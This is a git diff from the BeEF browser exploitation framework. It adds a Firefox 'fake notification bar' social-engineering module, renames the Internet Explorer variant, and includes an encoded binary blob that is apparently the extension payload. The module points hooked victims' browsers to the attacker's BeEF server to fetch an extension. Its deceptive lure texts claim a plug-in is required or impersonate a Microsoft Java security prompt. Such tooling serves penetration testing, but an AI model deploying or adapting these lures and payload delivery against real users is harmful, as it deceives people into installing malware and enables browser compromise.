zA*C4PNrxm$Sf?eJ_B56~@{~P^=LO;?1Rbvyj8hEQvsgDHL=6%}j>hKg`{ts~oGGYtnbz zehZV|?oJ+yn5Eqw7pFGBjQHZBoU^?H=>wW}MbuZ~{OY7p>?>!1);)oDaWEumY!o@& z=ao10rt)V=A6iD>kkzNvI-jpf38xFw^kpXfBa3TJQE0aF92;qAVpRt+X85=uN+S&0 zXD7`G$DKy|#Ja2>8Cr_y6jeHgdiScPFF(kkBvtSH$ZAo6#hBdJjuxgwZeaZa7#Zw8 zrS|?yW;dw&53AnwHX}KhfxV+Re2W!rK+q1`PvAgoTNc&vD?>q2cly&B4=J-}VXV$& zityWQy){C+otrm~hiUYPFxs7|kCvDHxwNBIskVC|{SMsxje5ex^j@QrmP zMVW9dV4+d_zyks}TiDH-qyLU36V5p^@NX?gz(KZTi+YSVAHx~i$d`1NG*fWN%4_P&9^OX$xsGm#7>W;HCD8I) zB$pl3QQyaE5+7CH;RR>0C(%V!9(}vtTPV{NtkNM0RRTB)DgPPg4705Z&XMS-9>J`03Wp628GS1me!J20s7@t>m zAm;vpHz%xaG2jU#@rGUcbjGwUNAL<6;YnV>e=x~|v&D3OE%lj5)#sLH|Kf+B9TpFI z(YION0*oN?6|_aoioo7rdQamH&aXg*%f5OOvdx5UH zM(4vv+ACJMBr=1?98RIv0cmo?M>s>qPM<(gnIRBz&F9j*n1aKLL|FD>yJ7B6XBuz_ z(DR1o<{~B^UJcFlIL9}L7}6CXOAD~?deAbSv@mMMaqno67kgW%j8kd8#gV>loHwop zL?|ewTK$EU;@~Phpw7pJY!kv*zh$HuH6dgZm-Of&Grpx2q_W)x>NT+ANK9w2W8XDzA0^E5VaMu$;SrP?0jE=ktpPNzG0h zBx_Dgm7oySGuuCepy-F_{K#96GNyqP>gnk!p)_)7ZGD#0j~SPP7#rr>ss(x*VdPUe zzLt%&Wrj?o<%Cc`0eWaEx7rK<=Q8zecRz~4-vUkokSEz&{S$cJ2)UQ1@6`0;>#$V0 zpsxA7;mMi|>e0cesXxu`t&@YP7mFqj>?7-OrJ-#W`pV0(*Jw>DavK}(LHDhvCjIyQ zCC?jql8OqmZKTW3{IbA$70HDOj<`SgxC~5atVcsDoxm zmpVik!Jh-e%*%gzNr>_KY>uKRO(G_%#p>%P!Tvxw z6glr`NN)NZ6(3yrMl*h$INlEY5N-OguBEdSISQF*ZwLeK=H)9V8#Fi^+}pQ>cwhQX zPcO!`KD9+}iXej*$}{!)I_jd=nmQ~Cr{@6 z+M})7+z#Q89qv~?_haY$OV`T#qZrrKU}%^bPagWfg$`gvVnFX7lV!@cWgUfQbm+g9 zv^r{LS@NVen*rh?8b&-;7BbgFXCfWM6wBMyOtzp&MDm5b{Z5HWp}@s`d!i-Wh8%o= z&TJWtaE(81f7`?mV2Lu}oVYh3i@g6%Qz~zD<-bw-*2mWmEpR64b+@Mf!9TOeq0dUb z)OHa6DuB&2f@Q6VR_EnS(Rmz7GP{nNc+3Tl1O=+6Al=j zA&6Wa;JO{lU>+n}B8>C@LHfQ<=#jy9w>)ydWRReb5lvRQ(NFc$Z@Oc^#Q5HDRPYOsZ&m};5tcU3A-~?piYTvA! zXX*XL2%->RH7k~=G`9O`(6#uo*H!&u;0T4&Z*uVI2|hce2L#v!+v+fGYo`Wtuh^?S z-wAuaY9r(jIo^y+Vgsdblno9`-|Kh<0?um?{ZXe>v7~Q{s+%eBqT4Wy3Eci7&p|QG zGa-MnC^Fs<-EJrT8YvjL?tOF`&SvGqZ1^kWmKxLh{#(j^BGGj(MorTK|IG|;RYrzj z3R2?OrD-(J-f1LA&ok}eaW+;?YBRU^snohexH(UR4x;SiF(KFmny|-ClB zU(L1es1aVI`7H&VOrGdJq4l|9D41!>Q?)CnWf2N+~g;Rc< zXCQDg3-2qjU{{u=E5NdQU=>nvxLv5VW8{|uf}nQt%f)qOoe5VhL0SU}aO;%UAiV_x zi)4Tm;%el1e+%)o3??&pYDUB!-l^{=9mV$1$EH^S^z$|VtT>pfCj5TnBC|mLk9&tt z?glM#uh508?~U4I9)gBVxs)ANJ|quK^i0RX+?vNC_=mUj=!b(^?|6G z=1@d&hEU(8;SSDV<7 z7chIG-pSPZS4Yt2h4>E64HYKaOh7-{(QfCCJL+o}0kT^_Fv}|$hA14WDvB9~1O65B zl$E?^HUuY3X*@&?jy--EQ$1W<9rs4>EzFBOz|G(L#o3VgzshrCU3l0)^Z*p7NBh*I z-2n_P`QqDw2M%Ua0<4hqL<5H5PJ&$DcEC=q)eyTcF0n}%g;NJf6s{gB!W?_cFvGUHBkl08w)pJ#0GudPT{}Wvd`1N_Vj@>jFYXjor z6dsWaFF6awk>B|>1yWdm%8_6}J_Flt8LvRehumDvrzr5N* ziOPrnlL>&Tb$P+4g>dH@>=voqNNB?D~NuEvt+x^0u3H=8i?*iW~*$;5lu>`$M zQkEu_>1I&jh&sC61Z&GCVmJYB=*z<0P=!GK+JYxb+X2tCS^H7E)YI;7iZR>j3w%pBB~wR6d9-hR5Fibl7jDs=vLqjKlDx+U_2i*&X@GtBMZ>$>p-! z3`Te1c6qlP)XoizrRIwk`*Nnkbkki^PZ-}-AlgejdA@i926jl!1wZR}qZ7qa4|pd+ zRBzO}{jFAee8N$h?1sPI?k7*_*;CZf0c}puFB=fmp}NOap}?g1hp)KNjqy`j4g~s) zf6!eI`KsREE5iBp+6}tpNGXoU+zcRyE_~AfNu2Lju#9(;a6Fx!;E1jO_d(@TQ60NR zOOlEFQcVzgq!ww|_q0TjCS8MCUOqfv9DJWa&lw|n2MMbal+?GG*Eh>P;k>nN z(-^T{UR;=viF4gm^Iu)*8A!tieTq5kA0C@MfA+rv*C`VdZiX2UdA-dER+dh%TSKa- zslWG8#2pPujx;jSQ%r`h}`)Msp3| zl{a@a$WmTABftWY*;c*@p=vZ^V!ys<1AuQ-SLyT~P&L);&_JIiBtXC+&vh=Y;{sUc zOOl;TuPqe_61IP8S z;&aPC97>hWpqMcK|Fo+G5w$2oB?9$33-B)hk{Zo#qYsV;Xr<_l6-XDo?Dk$;(s2d^ zdn!vwPU!1b@W*}o#&Db|LpQAw{g-$7c7TXdA_jlf=*}Ng10z;+`Fly@QeH#mVSOcQ5-NFo^|1Q!$K#jcZz%ennD@#n(D%ro>(f=3v eS0ed;BV!zPiZ>VD#s7n1fk=q_7OoN03;2KKGp>pN literal 0 HcmV?d00001 diff --git a/modules/social_engineering/fake_notification_ff/module.rb b/modules/social_engineering/fake_notification_ff/module.rb new file mode 100644 index 000000000..fba9d4154 --- /dev/null +++ b/modules/social_engineering/fake_notification_ff/module.rb @@ -0,0 +1,32 @@ +# +# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission +# +class Fake_notification_ff < BeEF::Core::Command + + def self.options + @configuration = BeEF::Core::Configuration.instance + beef_host = @configuration.get("beef.http.public") || @configuration.get("beef.http.host") + url = 'http://' + beef_host + ':' + @configuration.get("beef.http.port") +'/api/ipec/ff_extension' + return [ + {'name' => 'url', 'ui_label' => 'Plugin URL', 'value' => url, 'width'=>'150px'}, + { 'name' => 'notification_text', + 'description' => 'Text displayed in the notification bar', + 'ui_label' => 'Notification text', + 'value' => "An additional plug-in is required to display some elements on this page." + } + ] + end + + # + # This method is being called when a zombie sends some + # data back to the framework. + # + def post_execute + content = {} + content['result'] = @datastore['result'] + save content + end + +end diff --git a/modules/social_engineering/fake_notification/command.js b/modules/social_engineering/fake_notification_ie/command.js similarity index 100% rename from modules/social_engineering/fake_notification/command.js rename to modules/social_engineering/fake_notification_ie/command.js diff --git a/modules/social_engineering/fake_notification/config.yaml b/modules/social_engineering/fake_notification_ie/config.yaml similarity index 64% rename from modules/social_engineering/fake_notification/config.yaml rename to modules/social_engineering/fake_notification_ie/config.yaml index fb4ccf970..25604d287 100644 --- a/modules/social_engineering/fake_notification/config.yaml +++ b/modules/social_engineering/fake_notification_ie/config.yaml @@ -5,11 +5,11 @@ # beef: module: - fake_notification: + fake_notification_ie: enable: true category: "Social Engineering" - name: "Fake Notification" - description: "Displays a fake notification at the top of the screen, similar to those presented in IE." + name: "Fake Notification Bar (IE)" + description: "Displays a fake notification bar at the top of the screen, similar to those presented in IE." authors: ["xntrik"] target: user_notify: ['ALL'] diff --git a/modules/social_engineering/fake_notification/module.rb b/modules/social_engineering/fake_notification_ie/module.rb similarity index 86% rename from modules/social_engineering/fake_notification/module.rb rename to modules/social_engineering/fake_notification_ie/module.rb index c169f99a5..ff55ea7d5 100644 --- a/modules/social_engineering/fake_notification/module.rb +++ b/modules/social_engineering/fake_notification_ie/module.rb @@ -3,13 +3,13 @@ # Browser Exploitation Framework (BeEF) - http://beefproject.com # See the file 'doc/COPYING' for copying permission # -class Fake_notification < BeEF::Core::Command +class Fake_notification_ie < BeEF::Core::Command def self.options return [ { 'name' => 'notification_text', 'description' => 'Text displayed in the notification bar', - 'ui_label' => 'Text displayed in the notification bar', + 'ui_label' => 'Notification text', 'value' => "This website wants to run the following applet: \\'Java\\' from \\'Microsoft Inc\\'. To continue using this website you must accept the following security popup" } ]